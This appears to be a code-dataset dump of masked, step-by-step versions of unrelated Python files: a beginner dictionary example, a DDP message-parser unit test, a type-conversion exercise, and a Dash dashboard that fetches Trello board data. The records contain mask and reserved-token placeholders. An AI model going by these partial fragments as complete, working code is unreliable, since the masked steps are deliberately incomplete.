2,
3,
4,
5
] |
alien_0 = {} # 声明一个空字典
alien_0['color'] = 'green' # 向空字典中添加值
alien_0['points'] = 5
print(alien_0)
x = alien_0['color']
print(f"\nThe alien is {alien_0['color']}") # 引号的用法
alien_0['color'] = 'yellow' # 对字典中的元素重新赋值
print(f"The alien is now {alien_0['color']}")
|
normal
|
{
"blob_id": "f4dd9500835cb22a859da8bd57487052522bb593",
"index": 7697,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(alien_0)\n<mask token>\nprint(f\"\"\"\nThe alien is {alien_0['color']}\"\"\")\n<mask token>\nprint(f\"The alien is now {alien_0['color']}\")\n",
"step-3": "alien_0 = {}\nalien_0['color'] = 'green'\nalien_0['points'] = 5\nprint(alien_0)\nx = alien_0['color']\nprint(f\"\"\"\nThe alien is {alien_0['color']}\"\"\")\nalien_0['color'] = 'yellow'\nprint(f\"The alien is now {alien_0['color']}\")\n",
"step-4": "\nalien_0 = {} # 声明一个空字典\n\nalien_0['color'] = 'green' # 向空字典中添加值\nalien_0['points'] = 5\n\nprint(alien_0)\n\nx = alien_0['color']\n\nprint(f\"\\nThe alien is {alien_0['color']}\") # 引号的用法\n\nalien_0['color'] = 'yellow' # 对字典中的元素重新赋值\n\nprint(f\"The alien is now {alien_0['color']}\")\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class MethodMessageParserTestCase(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MethodMessageParserTestCase(unittest.TestCase):
<|reserved_special_token_0|>
def test_parse(self):
id = 'id'
method = 'method'
params = [True, 1.0]
message = self.parser.parse({'msg': 'method', 'id': id, 'method':
method, 'params': params})
self.assertEqual(message, MethodMessage(id, method, params))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MethodMessageParserTestCase(unittest.TestCase):
def setUp(self):
self.parser = MethodMessageParser()
def test_parse(self):
id = 'id'
method = 'method'
params = [True, 1.0]
message = self.parser.parse({'msg': 'method', 'id': id, 'method':
method, 'params': params})
self.assertEqual(message, MethodMessage(id, method, params))
<|reserved_special_token_1|>
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from ddp.messages.client import MethodMessage
from ddp.messages.client import MethodMessageParser
class MethodMessageParserTestCase(unittest.TestCase):
def setUp(self):
self.parser = MethodMessageParser()
def test_parse(self):
id = 'id'
method = 'method'
params = [True, 1.0]
message = self.parser.parse({'msg': 'method', 'id': id, 'method':
method, 'params': params})
self.assertEqual(message, MethodMessage(id, method, params))
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Copyright 2014 Foxdog Studios
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from ddp.messages.client import MethodMessage
from ddp.messages.client import MethodMessageParser
class MethodMessageParserTestCase(unittest.TestCase):
def setUp(self):
self.parser = MethodMessageParser()
def test_parse(self):
id = 'id'
method = 'method'
params = [True, 1.0]
message = self.parser.parse({'msg': 'method', 'id': id,
'method': method, 'params': params})
self.assertEqual(message, MethodMessage(id, method, params))
|
flexible
|
{
"blob_id": "e103e7a215614e1a7923838b775f49bba2792036",
"index": 8508,
"step-1": "<mask token>\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n <mask token>\n\n def test_parse(self):\n id = 'id'\n method = 'method'\n params = [True, 1.0]\n message = self.parser.parse({'msg': 'method', 'id': id, 'method':\n method, 'params': params})\n self.assertEqual(message, MethodMessage(id, method, params))\n",
"step-3": "<mask token>\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n\n def setUp(self):\n self.parser = MethodMessageParser()\n\n def test_parse(self):\n id = 'id'\n method = 'method'\n params = [True, 1.0]\n message = self.parser.parse({'msg': 'method', 'id': id, 'method':\n method, 'params': params})\n self.assertEqual(message, MethodMessage(id, method, params))\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport unittest\nfrom ddp.messages.client import MethodMessage\nfrom ddp.messages.client import MethodMessageParser\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n\n def setUp(self):\n self.parser = MethodMessageParser()\n\n def test_parse(self):\n id = 'id'\n method = 'method'\n params = [True, 1.0]\n message = self.parser.parse({'msg': 'method', 'id': id, 'method':\n method, 'params': params})\n self.assertEqual(message, MethodMessage(id, method, params))\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Copyright 2014 Foxdog Studios\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport unittest\n\nfrom ddp.messages.client import MethodMessage\nfrom ddp.messages.client import MethodMessageParser\n\n\nclass MethodMessageParserTestCase(unittest.TestCase):\n def setUp(self):\n self.parser = MethodMessageParser()\n\n def test_parse(self):\n id = 'id'\n method = 'method'\n params = [True, 1.0]\n message = self.parser.parse({'msg': 'method', 'id': id,\n 'method': method, 'params': params})\n self.assertEqual(message, MethodMessage(id, method, params))\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(float(my_int))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
greeting = 'My name is '
your_name = ''
best_string = 'I am '
your_age = 6
my_int = 5
print(float(my_int))
pi = 3.1415
<|reserved_special_token_1|>
# Create two integer variables and print their sum. What is the type of the
# result?
# Now, create a float variable and print its sum with an integer variable. What
# is the type of the result.
# Divide your smallest integer value by your largest integer value. Is the
# result what you expected? Now, do the same with your float variable and an
# integer variable. What to you get?
# Fill in the blanks, try adding the following two string variables and print
# the result. What do you get?
greeting = "My name is "
your_name = ""
# Try adding the following variables.
best_string = "I am "
your_age = 6
# Although Python can add integers and floats, it can't add strings and integers.
# In order to do this, we need to convert the integer variable to a string using
# the str keyword
# Uncomment the line below and check that it works.
# print(best_string + str(your_age))
# You can create complex string by using multiple string additions.
# Uncomment the line below and see the result.
# print(best_string + str(your_age) + " years old")
# We can also use the float keyword and the int keyword to convert variables to
# floats and ints respectively.
my_int = 5
print(float(my_int))
# Now, convert pi to an int.
pi = 3.1415
|
flexible
|
{
"blob_id": "fcbbffe0682da9f2131fdddbef606dcae3303ce9",
"index": 1979,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(float(my_int))\n<mask token>\n",
"step-3": "greeting = 'My name is '\nyour_name = ''\nbest_string = 'I am '\nyour_age = 6\nmy_int = 5\nprint(float(my_int))\npi = 3.1415\n",
"step-4": "# Create two integer variables and print their sum. What is the type of the\n# result?\n\n# Now, create a float variable and print its sum with an integer variable. What\n# is the type of the result.\n\n# Divide your smallest integer value by your largest integer value. Is the\n# result what you expected? Now, do the same with your float variable and an\n# integer variable. What to you get?\n\n# Fill in the blanks, try adding the following two string variables and print\n# the result. What do you get?\ngreeting = \"My name is \"\nyour_name = \"\"\n\n# Try adding the following variables.\nbest_string = \"I am \"\nyour_age = 6\n\n\n# Although Python can add integers and floats, it can't add strings and integers.\n# In order to do this, we need to convert the integer variable to a string using\n# the str keyword\n\n# Uncomment the line below and check that it works.\n# print(best_string + str(your_age))\n\n# You can create complex string by using multiple string additions.\n# Uncomment the line below and see the result.\n# print(best_string + str(your_age) + \" years old\")\n\n# We can also use the float keyword and the int keyword to convert variables to\n# floats and ints respectively.\n\nmy_int = 5\nprint(float(my_int))\n\n# Now, convert pi to an int.\n\npi = 3.1415\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
@app.callback(Output('ganttpersoon', 'figure'), [Input(
'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',
'value')])
def update_ganttpersoon(v1, v2):
ganttdata = []
for i, j in data['kaarten'].items():
if j[config.get('Custom Field for Person')] == v1 and j['Status'
] != 'Archived' and j['Status'] in v2:
try:
ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
'Custom Field for Starting date')].date(), Finish=j[
config.get('Custom Field for Ending date')].date(),
Resource=j['Epic']))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource',
show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
<|reserved_special_token_0|>
@app.server.route('/dash/configuration/')
def download_file():
return flask.send_file('./configuration/configuration.txt',
attachment_filename='configuration.txt', as_attachment=True,
cache_timeout=0)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_data(value):
global data
global config
with open('./configuration/configuration.txt') as json_file:
configfile = json.load(json_file)
config = configfile.get(value)
keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(
'API token')
trello_base_url = 'https://api.trello.com/1/'
board_url = trello_base_url + 'boards/' + value
url_cards = (board_url +
'?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'
+ keys)
url_lists = board_url + '/lists?filter=all&' + keys
url_customfields = board_url + '/customFields?' + keys
url_labels = board_url + '/labels?' + keys
url_members = board_url + '/members?' + keys
board = json.loads(json.dumps(requests.get(url_cards).json()))
lists = json.loads(json.dumps(requests.get(url_lists).json()))
customfields = json.loads(json.dumps(requests.get(url_customfields).json())
)
labels = json.loads(json.dumps(requests.get(url_labels).json()))
members = json.loads(json.dumps(requests.get(url_members).json()))
cards = board['cards']
def dateCalc(date):
try:
newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')
return newdate
except:
return None
customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},
'checkbox': {}}
for i in customfields:
customfields_dict[i['type']] = {}
for i in customfields:
customfields_dict[i['type']][i['id']] = {}
for i in customfields:
if i['type'] == 'list':
customfields_dict[i['type']][i['id']]['name'] = i['name']
customfields_dict['list'][i['id']]['options'] = {}
for j in i['options']:
customfields_dict['list'][i['id']]['options'][j['id']] = j[
'value'].get('text')
else:
customfields_dict[i['type']][i['id']]['name'] = i['name']
chosenlists = []
for i in config.get('Not Started'):
chosenlists.append(i)
chosenlists.extend(config.get('Blocked'))
chosenlists.extend(config.get('Doing'))
chosenlists.extend(config.get('Done'))
for i in config.get('Epics'):
chosenlists.append(i)
for i in config.get('Always continuing'):
chosenlists.append(i)
for i in config.get('List with Epics Done'):
chosenlists.append(i)
def idtodate(cardid):
hex = cardid[0:8]
timestamp = int(hex, 16)
timedate = datetime.fromtimestamp(timestamp)
return timedate
def get_epicid(url):
try:
if 'epicId=' in url:
start = url.find('epicId=') + 7
end = url.find('&attachmentId=')
return url[start:end]
else:
pass
except:
pass
kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i
['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':
idtodate(i['id']), 'labels': [label['name'] for label in i['labels'
] if i['labels'] != []], 'members': [member['fullName'] for member in
members if member['id'] in i['idMembers']], 'Sjabloon': i[
'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i
['closed'], 'epicid': [get_epicid(j['url']) for j in i[
'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in
cards}
for i, j in kaarten.items():
while None in j['epicid']:
j['epicid'].remove(None)
if j['members'] != []:
j['Leden'] = ''
for k in j['members']:
if j['Leden'] == '':
j['Leden'] += k
else:
j['Leden'] += ', ' + k
else:
j['Leden'] = None
del j['members']
if customfields_dict != {}:
for i, j in customfields_dict.items():
for k, l in j.items():
for m, n in kaarten.items():
n[l['name']] = None
for i, j in kaarten.items():
for k in j['customfields']:
if k['idCustomField'] in customfields_dict['list'].keys():
j[customfields_dict['list'][k['idCustomField']].get('name')
] = customfields_dict['list'][k['idCustomField']][
'options'].get(k['idValue'])
elif k['idCustomField'] in customfields_dict['checkbox'].keys(
):
if k['value']['checked'] == 'true':
j[customfields_dict['checkbox'][k['idCustomField']]
.get('name')] = True
else:
j[customfields_dict['checkbox'][k['idCustomField']]
.get('name')] = False
elif k['idCustomField'] in customfields_dict['date'].keys():
j[customfields_dict['date'][k['idCustomField']].get('name')
] = dateCalc(k['value'].get('date'))
else:
for key in k['value']:
j[customfields_dict[key][k['idCustomField']].get(
'name')] = k['value'].get(key)
epicIdNameCategory = []
for i, j in kaarten.items():
epicIdNameCategory.append((i, j['Naam'], j[config.get(
'Custom Field for Categories')]))
for i, j in kaarten.items():
if j['epicid'] == []:
j['Epic'] = 'Geen epic'
j['Categorie'] = None
else:
for k in epicIdNameCategory:
if k[0] == j['epicid'][0]:
j['Epic'] = k[1]
j['Categorie'] = k[2]
del j['epicid']
for i, j in kaarten.items():
for k in lists:
if j['ListID'] == k['id']:
j['Lijst'] = k['name']
if j['Lijst'] in config.get('Not Started'):
j['Status'] = 'Niet gestart'
elif j['Lijst'] in config.get('Doing'):
j['Status'] = 'Doing'
elif j['Lijst'] in config.get('Blocked'):
j['Status'] = 'Blocked'
elif j['Lijst'] in config.get('Done'):
j['Status'] = 'Done'
elif j['Lijst'] in config.get('Always continuing'):
j['Status'] = 'Doorlopend'
elif j['Lijst'] in config.get('Epics'):
j['Status'] = 'Epics Doing'
elif j['Lijst'] in config.get('List with Epics Done'):
j['Status'] = 'Epics Done'
else:
j['Status'] = 'Archived'
del j['customfields']
del j['ListID']
for i, j in kaarten.items():
if j['Gearchiveerd'] == True and j['Status'] != 'Done':
j['Status'] = 'Archived'
liststodelete = []
for i in lists:
if i['name'] not in chosenlists:
liststodelete.append(i['name'])
cardstodelete = []
for i, j in kaarten.items():
if j['Sjabloon'] == True:
cardstodelete.append(i)
elif j['Lijst'] in liststodelete:
cardstodelete.append(i)
hours = {}
for i, j in kaarten.items():
if j['Lijst'] == config.get('List for hours'):
hours[j['Naam']] = {config['Custom Field for Starting date']: j
[config['Custom Field for Starting date']], config[
'Custom Field for Ending date']: j[config[
'Custom Field for Ending date']], config[
'Custom Field with hours']: j[config[
'Custom Field with hours']]}
for i in cardstodelete:
if i in kaarten:
del kaarten[i]
tmpdatesdict = {}
now = datetime.now().date()
numdays = 365
numdayshistory = 183
for x in range(0, numdays):
tmpdatesdict[str(now + timedelta(days=x))] = {}
for x in range(0, numdayshistory):
tmpdatesdict[str(now - timedelta(days=x))] = {}
dates = []
for i in sorted(tmpdatesdict):
dates.append(i)
arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten
.values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i
[5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(
i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(
[card['Status'] for card in kaarten.values()])), config.get(
'Custom Field for Categories'): list(dict.fromkeys([card[config.get
('Custom Field for Categories')] for card in kaarten.values()])),
config.get('Custom Field for Person'): list(dict.fromkeys([(card[
config.get('Custom Field for Person')] if card[config.get(
'Custom Field for Person')] != None else 'Geen ' + config.get(
'Custom Field for Person')) for card in kaarten.values()]))}
try:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
get('Custom Field for Starting date'): kaart[config.get(
'Custom Field for Starting date')], config.get(
'Custom Field for Ending date'): kaart[config.get(
'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],
config.get('Custom Field for Person'): kaart[config.get(
'Custom Field for Person')], config.get(
'Custom Field for Categories'): kaart[config.get(
'Custom Field for Categories')], config.get(
'Custom Field with hours'): kaart[config.get(
'Custom Field with hours')], 'Cognosrapport': kaart[
'Cognosrapport'], 'Niet meenemen in telling': kaart[
'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':
kaart['Status'], 'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for
kaart in kaarten.values()}
except:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
get('Custom Field for Starting date'): kaart[config.get(
'Custom Field for Starting date')], config.get(
'Custom Field for Ending date'): kaart[config.get(
'Custom Field for Ending date')], config.get(
'Custom Field for Person'): kaart[config.get(
'Custom Field for Person')], config.get(
'Custom Field for Categories'): kaart[config.get(
'Custom Field for Categories')], config.get(
'Custom Field with hours'): kaart[config.get(
'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':
kaart['Status'], 'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for
kaart in kaarten.values()}
beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in
hours.keys()}
for i in dates:
datekey = datetime.strptime(i, '%Y-%m-%d').date()
for k, l in kaarten.items():
if l['Niet meenemen in telling'] != True:
try:
if l[config.get('Custom Field for Starting date')].date(
) < datekey <= l[config.get(
'Custom Field for Ending date')].date():
delta = l[config.get('Custom Field for Ending date')
] - l[config.get('Custom Field for Starting date')]
hoursperday = int(l[config.get(
'Custom Field with hours')]) / int(delta.days)
urenperdagperkaart[l['Naam']]['urenperdag'][i
] = hoursperday
except:
pass
for k, l in hours.items():
try:
if l[config.get('Custom Field for Starting date')].date(
) < datekey <= l[config.get('Custom Field for Ending date')
].date():
hoursperday = int(l[config.get('Custom Field with hours')]
) / int(30.4)
beschikbareuren[k]['urenperdag'][i] = hoursperday
except:
pass
for i, j in urenperdagperkaart.items():
for k, l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m == k[0:4] + k[5:7]:
j['urenperperiode'][m] += l
for i, j in beschikbareuren.items():
for k, l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m == k[0:4] + k[5:7]:
j['urenperperiode'][m] += l
dfurenpermaand = copy.deepcopy(urenperdagperkaart)
for i, j in dfurenpermaand.items():
try:
j['Geplande uren'] = int(j['Geplande uren'])
except:
j['Geplande uren'] = 0
for k, l in j['urenperperiode'].items():
j[k] = round(l, 2)
del j['urenperperiode']
bars = []
labelsnietingepland = []
for j in kaarten.values():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
labelsnietingepland.append(j['Lijst'])
labelsnietingepland = list(dict.fromkeys(labelsnietingepland))
for i, j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
tmp = []
for label in labelsnietingepland:
if j['Lijst'] == label:
tmp.append(int(j['Geplande uren']))
else:
tmp.append(0)
bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],
type='bar', opacity='0.6'))
epicbars = []
tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in
kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}
tmpepicsforbarchart['Geen epic'] = 0
for i, j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
tmpepicsforbarchart[j['Epic']] += int(j[config.get(
'Custom Field with hours')])
epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}
epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[
value for value in epicsforbarchart.values()], type='bar', text=[
value for value in epicsforbarchart.values()], textposition=
'outside', opacity='0.6'))
thismonth = datetime.strftime(datetime.now(), '%Y%m')
nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')
twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')
arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,
'%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,
'%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,
'%Y%m').strftime('%B'))]
gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
thismonth]))
gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
nextmonth]))
gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
twomonths]))
deltathismonth = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == thismonth]))
deltanextmonth = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == nextmonth]))
deltatwomonths = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == twomonths]))
if deltathismonth > gaugegeplandthismonth:
gaugerangethismonth = deltathismonth + 20
else:
gaugerangethismonth = gaugegeplandthismonth + 20
if deltanextmonth > gaugegeplandnextmonth:
gaugerangenextmonth = deltanextmonth + 20
else:
gaugerangenextmonth = gaugegeplandnextmonth + 20
if deltatwomonths > gaugegeplandtwomonths:
gaugerangetwomonths = deltatwomonths + 20
else:
gaugerangetwomonths = gaugegeplandtwomonths + 20
gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *
0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5,
deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [
deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},
{'range': [deltathismonth * 0.9, deltathismonth], 'color':
'#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}
gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *
0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5,
deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [
deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},
{'range': [deltanextmonth * 0.9, deltanextmonth], 'color':
'#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}
gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *
0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5,
deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [
deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},
{'range': [deltatwomonths * 0.9, deltatwomonths], 'color':
'#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}
gaugefig = go.Figure()
gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},
value=gaugegeplandthismonth, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').
strftime('%B')}, delta={'reference': deltathismonth}, gauge=
gaugestepsthismonth))
gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},
value=gaugegeplandnextmonth, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').
strftime('%B')}, delta={'reference': deltanextmonth}, gauge=
gaugestepsnextmonth))
gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},
value=gaugegeplandtwomonths, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').
strftime('%B')}, delta={'reference': deltatwomonths}, gauge=
gaugestepstwomonths))
gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,
'gaugefig': gaugefig}
columntypes = {}
for key, value in kaarten[next(iter(kaarten))].items():
if 'datum' in key or key == 'Aangemaakt':
columntypes[key] = 'datetime'
elif type(value) == int:
columntypes[key] = 'numeric'
elif type(value in [str, bool]):
columntypes[key] = 'text'
columntypesurenpermaand = dict(columntypes)
columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})
data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':
urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':
graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,
'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=
dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}
def make_layout():
    """Build the static page skeleton: banner with title and logo, the
    board dropdown, a refresh button, and the placeholder div ('test')
    that the board-selection callback fills with the dashboard."""
    banner_style = {
        'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',
        'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',
        'background':
        'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)',
        'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',
        'margin-left': '1%', 'border-radius': '10px',
        'text-align': 'center'}
    title = html.Div(style={'display': 'inline-block', 'width': '80%'},
                     children=[html.H1('Trello borden USD')])
    logo = html.Div(style={'display': 'inline-block', 'margin-right': '1px'},
                    children=[html.Img(src=app.get_asset_url('logonop.png'),
                                       style={'width': '150px',
                                              'margin-right': '0px'})])
    banner = html.Div(style=banner_style, className='Banner',
                      children=[title, logo])
    board_options = [{'label': i['name'], 'value': i['id']} for i in boards]
    board_selector = dcc.Dropdown(id='dropdown_boards', options=board_options,
                                  value=boards[0]['id'])
    return html.Div(className='First Div', children=[
        banner,
        html.H5('Kies hieronder een bord', style={'text-align': 'center'}),
        board_selector,
        html.Button('Data verversen', id='refreshdatabtn', n_clicks=0),
        html.Div(id='test')])
@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'
    ), Input('refreshdatabtn', 'n_clicks')])
def create_maindiv(value, n_clicks):
    """Rebuild the whole dashboard body for the selected board.

    Triggered when a board is chosen in the dropdown or the refresh
    button is clicked.  Re-fetches all Trello data via get_data(value)
    (which repopulates the module-level ``data`` dict) and returns a Div
    with four tabs: Gantt charts, data export tables, the long-term
    planning graphs and the tactical (three month) planning.
    """
    get_data(value)
    import os
    # Windows strftime does not support the %-d (no-padding) modifier.
    if os.name == 'nt':
        daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')
    else:
        daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')
    # One big declarative layout: a "last refreshed" line followed by the
    # four dcc.Tab sections; graph contents are filled by the per-graph
    # callbacks (ganttepics, ganttpersoon, urenpermaand, gantttactisch).
    return html.Div(className='', children=[dcc.Markdown(
        '**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',
        children=[dcc.Tab(label='Gantt charts', style=globals['styles'][
        'tabs'], children=[html.Div(className='tab2_div1', style=globals[
        'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=
        globals['styles']['divgraphs'], children=[dcc.Markdown(
        'In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'
        )])]), html.Div(className='tab2_div2', style=globals['styles'][
        'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(
        style=globals['styles']['dropdowns'], id='dropdownganttepics',
        options=[{'label': name, 'value': name} for name in data['arrays'][
        'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(
        style=globals['styles']['divgraphs'], children=[dcc.Graph(id=
        'ganttepics')])]), html.Div(className='tab2_div3', style=globals[
        'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.
        Dropdown(style=globals['styles']['dropdowns'], id=
        'dropdownganttpersoon', options=[{'label': name, 'value': name} for
        name in data['arrays'][config.get('Custom Field for Person')]]),
        dcc.Dropdown(style=globals['styles']['dropdowns'], id=
        'dropdownganttpersoonstatus', options=[{'label': name, 'value':
        name} for name in data['arrays']['statuses']], value=data['arrays']
        ['statuses'], multi=True), html.Div(style=globals['styles'][
        'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab
        (label='Data export', style=globals['styles']['tabs'], children=[
